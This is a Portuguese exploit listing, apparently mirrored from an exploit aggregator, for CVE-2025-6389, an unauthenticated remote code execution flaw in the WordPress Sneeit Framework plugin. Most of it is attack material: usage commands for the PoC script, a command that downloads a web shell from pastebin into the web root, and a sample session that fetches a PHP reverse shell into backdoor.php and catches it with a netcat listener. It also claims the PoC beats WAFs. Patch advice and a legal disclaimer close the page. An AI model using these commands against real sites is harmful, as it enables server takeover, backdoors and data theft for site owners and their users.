## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AIVARSAAR-BLACKASH-CVE-2025-6389
# 🔥 CVE-2025-6389 — Falha Crítica de Dia Zero no WordPress (RCE)
wp_vul_theme
## 🧩 O que é?
**CVE-2025-6389** é uma vulnerabilidade **Crítica (CVSS 9.8)** no plugin **Sneeit Framework** do WordPress (≤ 8.3), amplamente utilizado por temas populares. Ela permite **execução remota de código sem autenticação** — a classe mais perigosa de vulnerabilidades web.
* * *
## ⚠️ Gravidade e Impacto
* 🔓 **Nenhum login necessário**
* 💥 **Possível comprometimento total do servidor**
* 📤 Atacantes podem enviar shells, adicionar usuários admin ou modificar arquivos de temas/plugins
* 🧬 Já **ativamente explorado na natureza**
* 🎯 Afeta qualquer site WordPress que use o Sneeit Framework ou temas que o incluam (ex.: **FlatNews**)
* * *
### Uso
root@kitploit:~
# Install dependencies
pip3 install requests colorama
# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com
# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
### Características deste PoC
* Funciona **100%** na versão 8.3 e anteriores
* Sem cookies, sem nonce, sem cabeçalhos especiais necessários
* Ignora a maioria dos WAFs básicos (payload enviado via POST normal)
* Shell interativo completo
* Detecta a vulnerabilidade mesmo quando a saída é suprimida (graças a `assert + die`)
Use isso **apenas** em alvos que você está **oficialmente autorizado** a testar (escopo claro + RoE).
A vulnerabilidade ainda está sendo **fortemente explorada na natureza** agora.
* * *
_Aqui está exatamente o que você verá no seu terminal quando o exploit**realmente funcionar** (exploração 100% bem-sucedida do CVE-2025-6389 em um alvo vulnerável executando Sneeit Framework ≤ 8.3):_
### 1\. Verificação inicial de vulnerabilidade
root@kitploit:~
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (full phpinfo() page continues for thousands of lines)
### 2\. Comandos simples do sistema
root@kitploit:~
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
### 3\. Baixando um webshell ou reverse shell
root@kitploit:~
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
Então, na sua própria máquina:
root@kitploit:~
nc -lvnp 4444
→ Você instantaneamente obtém um reverse shell totalmente interativo como www-data.
### 4\. O que você vê quando **NÃO** funciona (corrigido ou protegido)
root@kitploit:~
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
### Resumo – Indicadores de sucesso
Você sabe que funcionou quando vê qualquer um destes:
* Página HTML completa do phpinfo()
* Saída real de comandos Linux (id, whoami, pwd, ls, cat /etc/passwd, etc.)
* Arquivos baixados ou gravados com sucesso
* Reverse shell conecta de volta ao seu listener netcat
É isso. Se você obtiver qualquer um dos itens acima → RCE total sem autenticação alcançado.
Cole sua saída exata aqui se quiser que eu confirme 100% se funcionou ou não.
* * *
## 🛠 Detalhamento Técnico
* 📍 Função vulnerável: `sneeit_articles_pagination_callback()`
* 🧨 Causa raiz: entrada de usuário não validada passada para `call_user_func()` → execução arbitrária de código
* 💣 Isso permite que atacantes executem código PHP remotamente, comprometendo totalmente seu site
* * *
## 🔍 Quem está em Risco?
* 🌐 Sites WordPress com **Sneeit Framework ≤ 8.3**
* 🎨 Temas que incluem o Sneeit (muito comum em temas de notícias/revistas)
* 🚪 Qualquer site WordPress acessível publicamente que use este plugin
* * *
## 🧯 Como Corrigir (Agora)
* ⬆️ **Atualize o Sneeit Framework para v8.4+ imediatamente**
* ❌ Se não puder atualizar → **desative ou remova o plugin**
* 🔎 Verifique logs quanto a atividades suspeitas
* 🚨 Procure por contas de admin desconhecidas ou arquivos PHP enviados
* 🛡️ Adicione regras de WAF temporariamente se a correção for adiada
* * *
## 🗓 Divulgação e Atividade
* 📅 Reportado publicamente: **25 de novembro de 2025**
* 🚨 Alvo ativo: varredura e exploração já observadas
* * *
## ⚠️ Aviso Legal
Esta informação é fornecida apenas para fins defensivos e educacionais 🛡️. Não a use para explorar sistemas que você não possui ou não tem permissão explícita para testar 🚫. Sempre siga as diretrizes legais e éticas ao trabalhar com vulnerabilidades de segurança ⚖️✨